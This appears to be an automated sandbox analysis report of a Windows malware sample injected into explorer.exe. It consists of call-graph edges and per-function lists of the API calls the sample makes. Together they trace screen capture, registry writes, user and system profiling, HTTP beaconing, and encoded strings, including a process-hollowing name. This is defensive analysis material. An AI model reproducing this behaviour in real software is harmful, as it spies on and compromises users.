34493->34491 34496 321f2de 34494->34496 34497 3223340 70 API calls 34495->34497 34498 3223340 70 API calls 34496->34498 34499 321f855 34497->34499 34500 321f2f3 34498->34500 34501 32061f0 114 API calls 34499->34501 34502 3223340 70 API calls 34500->34502 34503 321f860 34501->34503 34504 321f30e 34502->34504 34505 3223340 70 API calls 34503->34505 34506 32061f0 114 API calls 
34504->34506 34507 321f883 34505->34507 34508 321f315 34506->34508 34509 32061f0 114 API calls 34507->34509 34512 3224250 27 API calls 34508->34512 34511 321f88e 34509->34511 34513 3223340 70 API calls 34511->34513 34514 321f352 34512->34514 34515 321f8b1 34513->34515 34654 321e870 161 API calls 3 library calls 34514->34654 34517 32061f0 114 API calls 34515->34517 34518 321f8bc 34517->34518 34520 3223340 70 API calls 34518->34520 34519 321f35b 34519->34404 34521 321f8dd 34520->34521 34522 32061f0 114 API calls 34521->34522 34523 321f8e8 34522->34523 34524 3223340 70 API calls 34523->34524 34525 321f8fa 34524->34525 34526 32061f0 114 API calls 34525->34526 34527 321f905 34526->34527 34528 3223340 70 API calls 34527->34528 34529 321f917 34528->34529 34530 32061f0 114 API calls 34529->34530 34531 321f922 34530->34531 34532 3223340 70 API calls 34531->34532 34533 321f93f 34532->34533 34534 32061f0 114 API calls 34533->34534 34535 321f94a 34534->34535 34536 32248f0 27 API calls 34535->34536 34537 321f95e 34536->34537 34538 3225740 27 API calls 34537->34538 34539 321f978 34538->34539 34540 3225740 27 API calls 34539->34540 34541 321f995 34540->34541 34542 3225740 27 API calls 34541->34542 34543 321f9b2 34542->34543 34544 32248f0 27 API calls 34543->34544 34545 321f9c7 34544->34545 34546 3225740 27 API calls 34545->34546 34547 321f9e6 34546->34547 34548 32248f0 27 API calls 34547->34548 34549 321f9fb 34548->34549 34550 3225740 27 API calls 34549->34550 34551 321fa1a 34550->34551 34552 32248f0 27 API calls 34551->34552 34553 321fa2f 34552->34553 34554 3225740 27 API calls 34553->34554 34555 321fa4e 34554->34555 34556 32248f0 27 API calls 34555->34556 34557 321fa63 34556->34557 34558 3225740 27 API calls 34557->34558 34559 321fa82 34558->34559 34560 32248f0 27 API calls 34559->34560 34561 321fa97 34560->34561 34562 3225740 27 API calls 34561->34562 34563 321fab6 34562->34563 34564 32248f0 27 API calls 34563->34564 34565 321facb 34564->34565 34566 3225740 27 API calls 
34565->34566 34567 321faea 34566->34567 34568 32248f0 27 API calls 34567->34568 34569 321faff 34568->34569 34570 3225740 27 API calls 34569->34570 34571 321fb1e 34570->34571 34572 32248f0 27 API calls 34571->34572 34573 321fb33 34572->34573 34574 3225740 27 API calls 34573->34574 34575 321fb52 34574->34575 34576 3225740 27 API calls 34575->34576 34577 321fb74 34576->34577 34578 3225740 27 API calls 34577->34578 34579 321fb96 34578->34579 34580 32248f0 27 API calls 34579->34580 34581 321fbab _AnonymousOriginator 34580->34581 34582 32207d3 34581->34582 34583 32208a8 34581->34583 34584 3223340 70 API calls 34582->34584 34585 3223340 70 API calls 34583->34585 34586 32207e9 34584->34586 34587 32208bd 34585->34587 34588 32061f0 114 API calls 34586->34588 34589 3223340 70 API calls 34587->34589 34590 32207f4 34588->34590 34591 32208d2 34589->34591 34592 32248f0 27 API calls 34590->34592 34659 3204d60 27 API calls _AnonymousOriginator 34591->34659 34594 3220808 34592->34594 34597 3223280 25 API calls 34594->34597 34595 32208e1 34660 320cb00 27 API calls 34595->34660 34607 3220816 _AnonymousOriginator 34597->34607 34598 32208f2 34599 3223340 70 API calls 34598->34599 34600 3220907 34599->34600 34601 32061f0 114 API calls 34600->34601 34602 3220912 34601->34602 34603 3225740 27 API calls 34602->34603 34604 322092c 34603->34604 34605 3223280 25 API calls 34604->34605 34605->34607 34606 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34608 3220cc6 34606->34608 34607->34606 34608->34304 34610 3210602 34609->34610 34611 3210a07 34609->34611 34610->34611 34613 3210616 Sleep InternetOpenW InternetConnectA 34610->34613 34612 3224250 27 API calls 34611->34612 34622 32109b4 _AnonymousOriginator 34612->34622 34614 3223340 70 API calls 34613->34614 34615 32106a2 34614->34615 34617 32061f0 114 API calls 34615->34617 34616 3210a02 _AnonymousOriginator 34619 32299c0 
__ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34616->34619 34620 32106ad HttpOpenRequestA 34617->34620 34618 3210adb 34621 322f02c 25 API calls 34618->34621 34623 3210ac8 34619->34623 34626 32106d6 _AnonymousOriginator 34620->34626 34625 3210ae0 34621->34625 34622->34616 34622->34618 34623->34328 34627 3223340 70 API calls 34626->34627 34628 321073e 34627->34628 34629 32061f0 114 API calls 34628->34629 34630 3210749 34629->34630 34631 3223340 70 API calls 34630->34631 34632 3210762 34631->34632 34633 32061f0 114 API calls 34632->34633 34634 321076d HttpSendRequestA 34633->34634 34637 3210790 _AnonymousOriginator 34634->34637 34636 3210818 InternetReadFile 34638 321083f _Yarn 34636->34638 34637->34636 34639 32108bf InternetReadFile 34638->34639 34639->34638 34641 3209d43 _AnonymousOriginator 34640->34641 34651 3209c7c _AnonymousOriginator 34640->34651 34645 3209e0f 34641->34645 34646 3209de3 _AnonymousOriginator 34641->34646 34642 3209e0a 34661 3224760 27 API calls 34642->34661 34643 3224250 27 API calls 34643->34651 34648 322f02c 25 API calls 34645->34648 34647 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34646->34647 34649 3209e06 34647->34649 34650 3209e14 34648->34650 34649->34347 34649->34478 34651->34641 34651->34642 34651->34643 34651->34645 34652->34462 34653->34471 34654->34519 34659->34595 34660->34598
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                  • RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                  • RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                  • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                  • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                  • RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                  • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                    • Part of subcall function 032061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 032068E0
                                                  • RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  • RegCloseKey.ADVAPI32(?), ref: 03206D5E
                                                  • GdiplusStartup.GDIPLUS(?,?,00000000,74D40A26,00000000), ref: 03206DEA
                                                  • GetDC.USER32(00000000), ref: 03206F62
                                                  • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032071CD
                                                  • GetSystemMetrics.USER32(00000000), ref: 03207226
                                                  • GetSystemMetrics.USER32(00000000), ref: 0320722F
                                                  • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 03207277
                                                  • GetSystemMetrics.USER32(00000001), ref: 032072CA
                                                  • GetSystemMetrics.USER32(00000001), ref: 032072D3
                                                  • CreateCompatibleDC.GDI32(?), ref: 032072DF
                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 032072F4
                                                  • SelectObject.GDI32(00000000,00000000), ref: 03207304
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0320732A
                                                  • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0320733E
                                                  • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 0320735A
                                                  • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 03207387
                                                  • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 0320740E
                                                  • SelectObject.GDI32(00000000,?), ref: 0320741B
                                                  • DeleteObject.GDI32(00000000), ref: 03207428
                                                  • DeleteObject.GDI32(?), ref: 03207430
                                                  • ReleaseDC.USER32(00000000,?), ref: 0320743A
                                                  • GdipDisposeImage.GDIPLUS(00000000), ref: 03207441
                                                  • GdiplusShutdown.GDIPLUS(?), ref: 032074E3
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 032075BA
                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 03207600
                                                  • GetSidIdentifierAuthority.ADVAPI32(?), ref: 0320760D
                                                  • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03207721
                                                  • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 03207748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                  • String ID: $($JI2xaL==$LIWxaL==$MtBBJywTQ32=$MtBBJywTQUo=$MtBBJywTQkM=$MtBBJywTQkQ=$NtUnmapViewOfSection$Uo1q9CQm$VcmpWR5CVB==$XtBBJyw=$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                  • API String ID: 1729688432-4143275530
                                                  • Opcode ID: 8d288c7a70a84e6b3fbc130ba66de789c413f5696ffd40ccd06751c092c31dcd
                                                  • Instruction ID: 0559a4b201110144cbdfc59ca1095f4ecfa143953f8cef390c891bb3d6e4b2b7
                                                  • Opcode Fuzzy Hash: 8d288c7a70a84e6b3fbc130ba66de789c413f5696ffd40ccd06751c092c31dcd
                                                  • Instruction Fuzzy Hash: 9BD2F671A20218AFDB18DF68CC84BDDBB75EF44300F548298E415AB2D6DB759AD8CF90
                                                  APIs
                                                    • Part of subcall function 0320A270: GetTempPathA.KERNEL32(00000104,?,74D40A26,?,00000000), ref: 0320A2B7
                                                  • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0320B77B
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320B8B5
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320B9EF
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BB29
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BC63
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BD9D
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320BED7
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C011
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                    • Part of subcall function 032061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 032068E0
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C14B
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C285
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0320C3BF
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(?), ref: 03206D5E
                                                  • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0320C4FF
                                                    • Part of subcall function 032093D0: GetVersionExW.KERNEL32(0000011C,74D40A26,774D0F00), ref: 0320944A
                                                    • Part of subcall function 032093D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032094AB
                                                    • Part of subcall function 032093D0: GetProcAddress.KERNEL32(00000000), ref: 032094B2
                                                    • Part of subcall function 032093D0: GetNativeSystemInfo.KERNELBASE(?), ref: 03209573
                                                    • Part of subcall function 032093D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03209577
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                  • String ID: QL0M$QN0u hA=$QS y9XNo$RLOKSv==$Tc DaB5n$US B8B5s
                                                  • API String ID: 3951112935-477335935
                                                  • Opcode ID: 946cba13dd55d49cb5c422032f65adcc8850c7e08ef7959b019b32c8c12ab19b
                                                  • Instruction ID: 45cb2e95e8a4091a768a2e597e0c853560d80c2ae60eb62cb1494cecad249cd7
                                                  • Opcode Fuzzy Hash: 946cba13dd55d49cb5c422032f65adcc8850c7e08ef7959b019b32c8c12ab19b
                                                  • Instruction Fuzzy Hash: 8E920872A202549BDB28DBB8CD887DDFB76AF45310F248318E411AF3D6D7758AC88B51

                                                   Control-flow Graph
                                                   [Control-flow graph edge list not reproduced; the APIs referenced by this function are listed below]
                                                  APIs
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 0320E91D
                                                  • CoInitialize.OLE32(00000000), ref: 0320EC54
                                                  • CoCreateInstance.OLE32(0325DFA8,00000000,00000001,0325E008,?), ref: 0320EC73
                                                  • CoUninitialize.OLE32 ref: 0320EC81
                                                  • CoUninitialize.OLE32 ref: 0320F055
                                                  • CoUninitialize.OLE32 ref: 0320F06C
                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0320F455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Uninitialize$CreateInitializeInstanceNameUser
                                                  • String ID: @3P$DGpyINWmPT4=$LI1Szb==$LI1yINWm$Uu YSv==$axS5 CIZPzb=$axS5 ykoPx==
                                                  • API String ID: 1775936440-192416382
                                                  • Opcode ID: dd8e76a371f646c6179158413eb40f03ba1978f2fc407a559be2c97d1556b2b1
                                                  • Instruction ID: 9e3d22482d2e3a323264e305eaf0ef04521511c1d7ad2ec03ba2732a982e6709
                                                  • Opcode Fuzzy Hash: dd8e76a371f646c6179158413eb40f03ba1978f2fc407a559be2c97d1556b2b1
                                                  • Instruction Fuzzy Hash: CA627F71A10258ABDF24DF24CD88BDDBB79AF49304F1085D8E409AB291DB759BC8CF51

                                                   Control-flow Graph
                                                   [Control-flow graph edge list not reproduced; the APIs referenced by this function are listed below]
                                                  APIs
                                                  • GetVersionExW.KERNEL32(0000011C,74D40A26,774D0F00), ref: 0320944A
                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032094AB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 032094B2
                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 03209573
                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03209577
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                  • String ID: M BCKb==$M BCLL==$M BDJb==$M BDKL==
                                                  • API String ID: 374719553-1883779511
                                                  • Opcode ID: 2749c51a43269837b9d70a84255ecf09d2f86b785b9b1e8016e9406e01c68fc9
                                                  • Instruction ID: 57018f7bc8beaa0766c33289341297cb73ae892b9a2d123167c22ba106b6664d
                                                  • Opcode Fuzzy Hash: 2749c51a43269837b9d70a84255ecf09d2f86b785b9b1e8016e9406e01c68fc9
                                                  • Instruction Fuzzy Hash: 2A022375E20244ABCB14FB28DC5A79EBB71EB45720F54429CD8426B3C3DB754AD88BC2

                                                   Control-flow Graph
                                                   [Control-flow graph edge list not reproduced; the APIs referenced by this function are listed below]
                                                  APIs
                                                  • _free.LIBCMT ref: 0323EA4B
                                                  • _free.LIBCMT ref: 0323EC17
                                                  • _free.LIBCMT ref: 0323EC8F
                                                  • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0323EE50,?,?,00000000), ref: 0323ECA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$InformationTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 597776487-239921721
                                                  • Opcode ID: 9ea5dcc96b3b26d29e73c2e89e1d51ef53751c9962f17048e5ab19189a838ddb
                                                  • Instruction ID: 6545d7dd8172df8763805cf16cd2abc0f815ab6f167933f1e81c041f0fb60f3f
                                                  • Opcode Fuzzy Hash: 9ea5dcc96b3b26d29e73c2e89e1d51ef53751c9962f17048e5ab19189a838ddb
                                                  • Instruction Fuzzy Hash: 2AA12CF7920315ABCF10FF64DC45AAE7B7DEF46610F154066E905AB280EB709AC9C790

                                                  APIs
                                                  • GetVersionExW.KERNEL32(0000011C,74D40A26,774D0F00), ref: 0320944A
                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032094AB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 032094B2
                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 03209573
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                  • String ID:
                                                  • API String ID: 2167034304-0
                                                  • Opcode ID: c635774f0fcd9190f45ea10c64491f3499850b7b8fd96807c2359a96b08ceb52
                                                  • Instruction ID: 08d6ae0592e0df3258763ebb6387eb5cf5e4b051e3a53da6152909672b10164e
                                                  • Opcode Fuzzy Hash: c635774f0fcd9190f45ea10c64491f3499850b7b8fd96807c2359a96b08ceb52
                                                  • Instruction Fuzzy Hash: F4C1E472E20204AFDB14DF68CC84B9EFB79EB49310F548258E8159B2D7DB759AC4CB90
                                                  APIs
                                                    • Part of subcall function 032105B0: Sleep.KERNELBASE(000005DC,74D40A26,?,00000000), ref: 03210642
                                                    • Part of subcall function 032105B0: InternetOpenW.WININET(0325DB50,00000000,00000000,00000000,00000000), ref: 03210651
                                                    • Part of subcall function 032105B0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 03210675
                                                    • Part of subcall function 032105B0: HttpOpenRequestA.WININET(?,00000000), ref: 032106BF
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0321F592
                                                  • RegCloseKey.KERNELBASE(80000002), ref: 0321F5A8
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  • GetUserNameA.ADVAPI32(?,80000002), ref: 0321F632
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0321F6BD
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                    • Part of subcall function 032061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 032068E0
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(?), ref: 03206D5E
                                                    • Part of subcall function 032061F0: GdiplusStartup.GDIPLUS(?,?,00000000,74D40A26,00000000), ref: 03206DEA
                                                    • Part of subcall function 032061F0: GetDC.USER32(00000000), ref: 03206F62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Open$Close$Value$InternetNameQuery$ConnectEnumFileGdiplusHttpInfoModuleRequestSleepStartupUser
                                                  • String ID: 246122658369$8a680c$Im==$NI5CJv==$PwN+$PwR+$R$System$YNJa$YNZa$Ycla$Zw1a$aMRa$bSda$bTNa$bxZa$c 1=$cSRa$cTRd r==$cwNa$dM5a$ddNa$invalid stoi argument$stoi argument out of range
                                                  • API String ID: 2912196086-75614579
                                                  • Opcode ID: 83b0fbd95d0e6ffb417caf243991ee2cb73a4857f4fcba573c3004470296d730
                                                  • Instruction ID: 4fd48d5bfcf2003b9ce5c36405b48c52ffefe22af355fbc850b53243e6a36618
                                                  • Opcode Fuzzy Hash: 83b0fbd95d0e6ffb417caf243991ee2cb73a4857f4fcba573c3004470296d730
                                                  • Instruction Fuzzy Hash: 67131671A20268ABDB19DB28CE8879DFF76AF45304F5082D8D408AB2D5DB754FC48F91
                                                  APIs
                                                    • Part of subcall function 032061F0: GetUserNameA.ADVAPI32(?,?), ref: 032075BA
                                                    • Part of subcall function 032061F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 03207600
                                                    • Part of subcall function 032061F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0320760D
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0321F592
                                                  • RegCloseKey.KERNELBASE(80000002), ref: 0321F5A8
                                                  • GetUserNameA.ADVAPI32(?,80000002), ref: 0321F632
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0321F6BD
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
